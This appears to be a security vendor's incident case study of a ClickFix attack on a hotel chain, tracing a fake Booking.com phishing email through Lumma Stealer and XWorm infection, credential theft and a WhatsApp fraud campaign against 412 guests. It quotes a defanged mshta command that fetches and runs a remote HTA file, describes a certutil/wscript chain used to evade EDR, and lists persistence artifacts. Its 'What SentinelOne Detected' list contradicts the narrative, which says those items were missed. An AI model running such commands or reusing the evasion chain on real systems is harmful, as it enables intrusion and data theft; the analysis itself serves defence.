The Situation
The first complaint arrived at 09:15 on a Tuesday morning. A guest called reception to ask why the hotel was requesting payment via WhatsApp when they had already paid in full. By 10:00, reception had received seven similar calls across three properties.
The WhatsApp messages were convincing. They contained the guest's full name, booking reference, check-in date, room type, and the exact amount paid. The message claimed there was a "payment verification issue" and provided a link to "confirm" card details. The phone numbers sending the messages were unknown, but the booking data was accurate.
The hotel chain contacted their managed service provider. The MSP had deployed SentinelOne across all endpoints six months earlier. A check of the console showed no alerts, no detections, no suspicious activity. Yet somehow, guest data was in the hands of fraudsters.
The MSP's initial theory was that Booking.com itself had been breached. But Booking.com confirmed their systems were secure. The compromise had to be on the hotel's side.
The Challenge
The MSP faced a multi-layered problem. Guest data was actively being exploited for fraud. The source of the compromise was unknown. The EDR showed nothing. And every hour that passed meant more guests receiving fraudulent WhatsApp messages.
Traditional forensic imaging of 92 front-of-house computers across five properties would take months. Each device would need to be taken offline, imaged, and analysed individually. For a hotel chain operating 24/7, this approach was not viable.
The reputational damage was mounting. Guests were posting on social media. Review sites were filling with complaints. The hotel needed to understand what had happened, notify affected guests, and demonstrate to regulators that they had responded appropriately.
The Investigation
Strand's collection agent was deployed remotely to all 92 front-of-house devices across the chain's five properties within two hours. The investigation revealed a sophisticated attack chain that Microsoft tracks as Storm-1865, a threat actor specifically targeting the hospitality sector.
The Phishing Email: Fake Booking.com Notification
The attack began three days earlier with a phishing email to the reservations team. The email appeared to come from Booking.com with the subject line "You have a new last-minute booking - Action Required." The formatting, branding, and sender address closely mimicked legitimate Booking.com partner notifications.
Email header analysis recovered from Outlook cached data showed the message originated from a lookalike domain: booking-partner-notifications[.]com. The email contained a single call-to-action button: "View Booking Details." URL analysis revealed it pointed to a typosquatted domain hosting a fake Booking.com extranet login page.
The ClickFix CAPTCHA: Social Engineering the User
When the reservations staff member clicked through to view the supposed booking, they encountered what appeared to be a Booking.com verification page. The page displayed a CAPTCHA with instructions to "verify you are human" by pressing a specific key combination: Windows + R, then Ctrl + V, then Enter.
The fake CAPTCHA page used JavaScript to silently copy a malicious mshta.exe command to the clipboard when the user clicked the checkbox. The Win+R shortcut opened the Windows Run dialog, Ctrl+V pasted the command, and Enter executed it. From the system's perspective, the user voluntarily ran the command, making it appear as legitimate activity under explorer.exe.
Dual Payload: Infostealer and RAT
The mshta.exe command downloaded and executed two payloads: Lumma Stealer for credential harvesting and XWorm RAT for persistent remote access. This combination is characteristic of Storm-1865 campaigns observed throughout 2025.
The mshta command (recovered from RunMRU at HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU) executed: mshta hxxps://booking-extranet-verify[.]com/captcha.hta. The HTA file contained obfuscated VBScript that downloaded lumma.exe and xworm.exe to C:\Users\Public\Downloads\, executing both with scheduled task persistence.
Why SentinelOne Missed It
The EDR detected and blocked the initial suspicious activity but failed to catch the fallback mechanism. SentinelOne flagged the mshta.exe network connection as suspicious and terminated the process. However, the ClickFix page anticipated this and displayed "Verification failed - please try again" with a modified command.
The second attempt used a different execution chain: the command wrote a Base64-encoded PowerShell script to a .txt file in %TEMP%, then used certutil.exe to decode it, and finally executed it via wscript.exe. This LOLBIN chain evaded the behavioural signatures that caught the first attempt.
Credential Theft and Extranet Access
Lumma Stealer harvested saved credentials from Chrome within 30 seconds of execution. The Booking.com extranet credentials were exfiltrated to the attacker's C2 server. Four hours later, the threat actor logged into the legitimate Booking.com extranet using the stolen credentials.
Chrome Login Data SQLite database analysis confirmed access to stored credentials. Browser history from the threat actor's session (captured via XWorm's keylogging and screenshot functionality) showed them navigating to Booking.com extranet, accessing the reservations dashboard, and exporting guest data including names, phone numbers, email addresses, and booking details.
Guest Data Extraction and WhatsApp Campaign
The threat actor exported reservation data for 412 guests with upcoming bookings. Within 24 hours, these guests began receiving WhatsApp messages from unknown numbers containing their exact booking details and a fraudulent payment link.
XWorm RAT logs recovered from the C2 callback data showed clipboard activity consistent with copying guest phone numbers. The WhatsApp messages were sent from disposable SIM numbers, making them untraceable. The payment links directed to a fake Booking.com payment page designed to harvest card details.
Persistence Mechanisms Identified
Strand identified multiple persistence mechanisms that remained active on the compromised workstation. The XWorm RAT had established scheduled tasks, registry run keys, and a startup folder shortcut to ensure it survived reboots.
Persistence artifacts: Scheduled task "ChromeUpdateService" executing C:\Users\Public\Downloads\svchost.exe (actually XWorm); Registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefender pointing to the same binary; Startup folder shortcut disguised as "Microsoft Edge.lnk" with a modified target path. All three mechanisms were missed by the EDR.
Attack Timeline
Phishing email received
- ›Subject: "You have a new last-minute booking - Action Required"
- ›Sent to reservations team email
From: noreply@booking-partner-notifications[.]com
Staff member clicks through to fake extranet
- ›Fake Booking.com login page displayed
- ›ClickFix CAPTCHA presented
First ClickFix attempt blocked
- ›SentinelOne flags mshta.exe network activity
- ›Process terminated
EDR Alert: Suspicious script execution
Second attempt succeeds
- ›"Verification failed, try again" displayed
- ›certutil/wscript chain bypasses EDR
LOLBIN execution chain
Dual payload deployed
- ›Lumma Stealer harvests credentials
- ›XWorm RAT establishes persistence
C:\Users\Public\Downloads\svchost.exe
Threat actor accesses Booking.com extranet
- ›Login from Eastern European IP
- ›Guest reservation data exported
412 guest records accessed
WhatsApp fraud campaign
- ›Guests receive messages with real booking details
- ›Fraudulent payment links distributed
First guest complaint received
- ›Investigation initiated
- ›Strand deployed to 92 devices
Detection Analysis
What SentinelOne Detected
- Initial mshta.exe network connection flagged and blocked
- Process terminated before payload delivery
- Second attempt via certutil/wscript LOLBIN chain
- Lumma Stealer credential harvesting
- XWorm RAT installation and C2 communication
- Three separate persistence mechanisms
What Strand Identified
- Phishing email with lookalike domain in cached Outlook data
- RunMRU entries showing both mshta and certutil execution
- Lumma Stealer artifacts and Chrome credential access timestamps
- XWorm RAT binary disguised as svchost.exe
- Three persistence mechanisms (scheduled task, run key, startup folder)
- 412 guests with exported data identified for notification
Key Takeaways
- 1Storm-1865 specifically targets hospitality sector staff with convincing Booking.com phishing emails. Staff should verify unexpected "new booking" or "action required" emails by logging into the extranet directly rather than clicking email links.
- 2ClickFix attacks anticipate EDR detection and include fallback execution methods. Blocking the first attempt is not sufficient if users retry when prompted.
- 3The combination of infostealer plus RAT enables both immediate credential theft and persistent access for ongoing exploitation.
- 4LOLBIN chains using certutil, wscript, and mshta can bypass behavioural detection that catches direct PowerShell execution.
- 5Booking.com extranet credentials provide access to guest PII including phone numbers. This data enables highly convincing fraud campaigns via WhatsApp that bypass email security entirely.
- 6Compromised Booking.com partner accounts are sold on Russian-speaking forums for $30 to $5,000 depending on reservation volume. Hotels are high-value targets in this underground economy.